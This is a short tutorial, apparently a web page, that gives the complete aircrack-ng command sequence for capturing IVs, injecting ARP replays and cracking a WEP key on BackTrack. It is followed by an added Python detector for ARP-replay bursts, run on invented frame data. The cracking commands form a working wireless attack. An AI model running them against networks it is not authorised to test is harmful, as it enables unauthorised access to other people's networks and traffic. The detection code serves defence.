Testing the Security of a Wireless Network
These are instructions for testing the security of a wireless network using BackTrack v. 3 beta.
Download the BackTrack ISO and burn it to a CD. These instructions assume you are using a computer that can boot from a CD drive and that you have an Atheros wireless card. These instructions are valid for testing WEP encryption. They have been consolidated from instructions found on the aircrack-ng website. After booting to BackTrack, run the following commands.
airmon-ng stop ath0
airmon-ng start wifi0
This deletes the default wireless interface and creates a new one in monitor mode.
airodump-ng ath0
Find the network you are interested in, end the first airodump-ng, and start a targeted one.
airodump-ng -c 11 --bssid 01:02:03:04:05:06 --ivs -w dump ath0
The -c parameter tells it which channel to listen on. --bssid gives the MAC address of the access point of interest; it is optional and only matters if more than one access point is broadcasting on the same channel. --ivs tells airodump-ng to capture only the IVs, to save disk space. -w sets the filename prefix of the dump file written to disk.
Open a second terminal and start aireplay-ng to inject ARP packets, where -b is the MAC address (BSSID) of the access point and -h is the MAC address of an associated host.
aireplay-ng --arpreplay -b 01:02:03:04:05:06 -h 00:04:05:06:07:08 ath0
Open a third terminal and start aircrack-ng to crack the WEP key.
aircrack-ng -b 01:02:03:04:05:06 dump-01.ivs
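Seen from the monitoring side, the ARP injection step above shows up as one station sending a flood of same-sized frames through the access point. The following is an added example, not part of the original instructions: a sliding-window check over constructed frame records. The record layout, the 68-byte length, the window and the threshold are all assumptions; the MAC addresses reuse the page's placeholders.

```python
from collections import defaultdict, deque

# Constructed sample data: (seconds, bssid, source MAC, frame length in bytes).
# MACs reuse the page's placeholder addresses; lengths and timing are invented.
AP = "01:02:03:04:05:06"
HOST = "00:04:05:06:07:08"
OTHER = "00:0a:0b:0c:0d:0e"


def build_sample():
    frames = []
    # Ordinary client: varied frame sizes, about three frames per second.
    for i in range(30):
        frames.append((i / 3.0, AP, OTHER, 90 + (i * 37) % 1200))
    # Replay burst: one source repeats a same-sized frame 400 times in 2 s.
    for i in range(400):
        frames.append((4.0 + i * 0.005, AP, HOST, 68))
    return sorted(frames)


def detect_replay(frames, window=1.0, threshold=100):
    """Return {(bssid, src, length): peak count} for each key whose count of
    identical-length frames within any `window` seconds reaches `threshold`.
    Frames must be sorted by timestamp."""
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    peaks = {}
    for ts, bssid, src, length in frames:
        key = (bssid, src, length)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that aged out
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks


if __name__ == "__main__":
    for (bssid, src, length), peak in detect_replay(build_sample()).items():
        print(f"possible ARP replay on {bssid}: {src} sent {peak} "
              f"{length}-byte frames within 1 s")
```

Tune the window and threshold against a baseline of the network's normal traffic before alerting on the result.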

